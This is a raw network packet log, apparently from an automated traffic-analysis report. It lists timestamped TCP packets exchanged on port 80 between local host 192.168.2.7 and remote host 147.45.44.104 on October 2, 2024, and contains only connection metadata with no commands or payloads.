                                                                                                            Oct 2, 2024 08:55:00.271605015 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.271620989 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.271641970 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.271665096 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.272164106 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.272180080 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.272196054 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.272209883 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.272224903 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.272226095 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.272242069 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.272258997 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.272273064 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.272279978 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.272279978 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.272289991 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.272305012 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.272320986 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.272322893 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.272341967 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.272346020 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.272362947 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.272378922 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.272394896 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.272423029 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.272423029 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.273003101 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.273019075 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.273042917 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.273058891 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.273076057 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.273077965 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.273077965 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.273092985 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.273108959 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.273121119 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.273163080 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.273355961 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.273372889 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.273389101 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.274916887 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.323240995 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.389504910 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.394500971 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.394530058 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.394556999 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.394635916 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.394674063 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.394690037 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.394715071 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.394732952 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.394753933 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.394824028 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.394869089 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.394869089 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.394958973 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.394979000 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.394999027 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395013094 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395028114 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395042896 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395056009 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.395056009 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.395057917 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395073891 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395150900 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.395150900 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.395315886 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395484924 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395500898 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395517111 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395543098 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395559072 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395572901 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.395572901 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.395574093 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395591021 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395606041 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395622015 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395625114 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.395636082 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395665884 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.395665884 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.395667076 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395724058 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396102905 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396125078 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396135092 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396140099 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396147013 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396152973 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396162987 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396173000 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396178007 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396178961 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396189928 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396205902 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396213055 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396228075 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396229029 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396229029 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396245956 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396248102 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396313906 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396750927 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396765947 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396781921 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396796942 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396799088 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396811962 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396828890 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396832943 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396843910 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396850109 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396861076 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396877050 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396889925 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396907091 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396918058 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396918058 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396951914 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397365093 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397396088 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397409916 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397424936 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397439957 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397454977 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397468090 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397468090 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397476912 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397481918 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397488117 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397502899 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397514105 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397514105 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397526026 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397541046 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397557020 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397562981 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397577047 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397577047 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397583961 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397599936 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397603035 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397609949 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397625923 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397628069 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397711039 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398359060 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398375988 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398389101 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398403883 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398417950 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398433924 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398446083 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398446083 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398449898 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398467064 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398480892 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398495913 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398509979 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398510933 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398509979 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398526907 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398545027 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398551941 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398556948 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398572922 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398578882 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398578882 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398588896 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398605108 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398618937 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398618937 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398621082 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398669004 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.399322033 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399327993 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399333954 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399339914 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399355888 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399369001 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.399372101 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399399996 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.399399996 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.399405956 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399431944 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399447918 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399463892 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399477959 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399481058 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.399493933 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399508953 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399512053 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.399512053 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.399525881 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399547100 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399585009 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.399612904 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400194883 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400209904 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400227070 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400242090 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400257111 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400271893 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400285006 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400285006 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400286913 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400301933 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400319099 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400321960 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400335073 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400350094 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400366068 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400366068 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400377989 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400393009 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400408983 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400424957 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400439978 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400443077 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400444031 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400458097 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400475025 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400494099 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400521994 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.401818991 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401838064 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401851892 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401868105 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401880980 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401896000 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401910067 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.401910067 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.401911020 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401932955 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401948929 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401961088 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.401963949 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401979923 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401994944 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.402009010 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.402014017 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.402014017 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.402024984 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.402040005 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.402055025 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.402065992 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.402065992 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.402070999 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.402087927 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.402101994 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.402117968 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.402117968 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.402982950 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.403000116 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.403012991 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.403029919 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.403067112 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.405078888 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.405136108 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.405152082 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.405270100 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.405273914 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.405296087 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.405335903 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.405380964 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.405411005 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.405426025 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.405462027 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.405491114 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.437114954 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.437174082 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.437191010 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.437232971 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.437306881 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.437323093 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.437350035 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.437401056 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.437419891 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.437447071 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.443742990 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.443809032 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.443825006 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.443841934 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.443967104 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.443980932 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.443996906 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.444019079 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.444034100 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.444077015 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.444077969 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.444216967 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.444232941 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.444247961 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.444262981 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.444272995 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.444300890 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.444510937 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.444525957 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.444556952 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.444572926 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.444587946 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.444608927 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.444608927 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.444610119 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.444627047 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.444642067 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.444657087 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.444677114 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.444677114 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.445169926 CEST8049702147.45.44.104192.168.2.7
